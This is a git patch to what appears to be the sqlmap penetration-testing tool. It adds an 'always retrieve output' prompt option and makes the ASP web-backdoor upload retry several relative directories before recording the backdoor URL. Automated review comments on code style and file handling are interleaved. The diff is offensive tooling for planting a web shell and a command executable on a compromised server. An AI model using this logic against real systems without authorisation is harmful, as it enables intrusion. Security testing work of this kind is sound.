From b558712a4741bf0f445982a9770acbeade3643ed Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 25 Feb 2010 11:40:49 +0000
Subject: [PATCH] more feature updates

---
 lib/takeover/abstraction.py | 13 +++++++++----
 lib/takeover/web.py         | 32 ++++++++++++++++++--------------
 2 files changed, 27 insertions(+), 18 deletions(-)

diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index b464abae6..2752bdacd 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -41,6 +41,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 
     def __init__(self):
         self.envInitialized = False
+        self.alwaysRetrieveCmdOutput = False
 
         UDF.__init__(self)
         Web.__init__(self)
@@ -77,11 +78,15 @@ class Abstraction(Web, UDF, xp_cmdshell):
     def runCmd(self, cmd):
         getOutput = None
 
-        message = "do you want to retrieve the command standard "
-        message += "output? [Y/n] "
-        getOutput = readInput(message, default="Y")
+        if not self.alwaysRetrieveCmdOutput:
+            message = "do you want to retrieve the command standard "
+            message += "output? [Y/n/a] "
+            getOutput = readInput(message, default="Y")
+
+            if getOutput in ("a", "A"):
+                self.alwaysRetrieveCmdOutput = True
 
-        if not getOutput or getOutput in ("y", "Y"):
+        if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
             output = self.evalCmd(cmd)
 
             if output:
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 6461f961c..0a630adb5 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -169,7 +169,7 @@ class Web:
 
             backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
             backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
-            backdoorContent = backdoorStream.read()
+            originalBackdoorContent = backdoorContent = backdoorStream.read()
             uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
             uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
 
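Review bot: The new `self.alwaysRetrieveCmdOutput` attribute added to `__init__` carries no comment, and its meaning is only discoverable by reading `runCmd` in the following hunk. A one-line comment at the assignment would save the next reader that trip, e.g. `# set once the user answers "a" at runCmd()'s output prompt; the prompt is then skipped for the rest of the session`. `__init__` continues outside the hunk.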
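Review bot: The `or self.alwaysRetrieveCmdOutput` tail on the new condition in `runCmd` is redundant: when the flag is already set the prompt is skipped and `getOutput` stays `None`, so `not getOutput` is already true; the only case the tail actually covers is the call in which the user has just answered "a". Naming that answer explicitly is equivalent and reads clearer: `if not getOutput or getOutput in ("y", "Y", "a", "A"):`. It is also worth a comment next to the `("a", "A")` check that the choice is one-way for the session, since once the flag is set the `[Y/n/a]` prompt is never shown again. `runCmd`'s body continues outside the hunk.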
@@ -200,20 +200,24 @@ class Web:
             logger.info(infoMsg)
 
             if self.webApi == "asp":
+                scriptsDirectory = "Scripts"
                 runcmdName = "tmpe%s.exe" % randomStr(4)
                 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
-                scriptsDirectory = "Scripts"
-                backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
-                backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
-                backdoorStream.file.truncate()
-                backdoorStream.read()
-                backdoorStream.seek(0)
-                backdoorStream.write(backdoorContent)
-                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
-                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
-                    self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
-                    self.webDirectory = directory
-                else:
+                backdoorUploaded = False
+                for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
+                    backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
+                    backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                    backdoorStream.file.truncate()
+                    backdoorStream.read()
+                    backdoorStream.seek(0)
+                    backdoorStream.write(backdoorContent)
+                    if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                        self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                        self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
+                        self.webDirectory = backdoorDirectory
+                        backdoorUploaded = True
+                        break
+                if not backdoorUploaded:
                     continue
             elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
                 warnMsg = "backdoor hasn't been successfully uploaded "
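Review bot: The truncate/read/seek/write sequence carried into the new `for backdoorDirectoryFormat` loop only works while each rewrite is at least as long as what is already in the file: `backdoorStream.file.truncate()` with no size truncates at the current offset, which after the previous iteration's `write()` is the end of the data just written, so it removes nothing, and the following `seek(0)`/`write()` overwrites only as many bytes as the new content has. The loop happens to be safe because each candidate path in the tuple is longer than the one before it, but a shorter candidate or a reordered tuple would leave stale trailing bytes from the previous iteration in the file. The conventional order is `backdoorStream.seek(0)`, `backdoorStream.file.truncate()`, `backdoorStream.write(backdoorContent)`, which also makes the intervening `backdoorStream.read()` unnecessary; `posixToNtSlashes(directory)` is loop-invariant and could be computed once before the loop. As a point of style, the format strings `"%s.\%s"`, `"%s..\%s"` and `"%s..\..\%s"` rely on `\%` not being a recognised escape; raw strings such as `r"%s..\%s"` state the intent and avoid the invalid-escape warning newer interpreters emit. The enclosing method starts and ends outside the hunk.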
@@ -231,7 +235,7 @@ class Web:
                 self.webDirectory = directory
 
             infoMsg = "the backdoor has probably been successfully "
-            infoMsg += "uploaded on '%s', go with your browser " % directory
+            infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
             infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
             logger.info(infoMsg)
 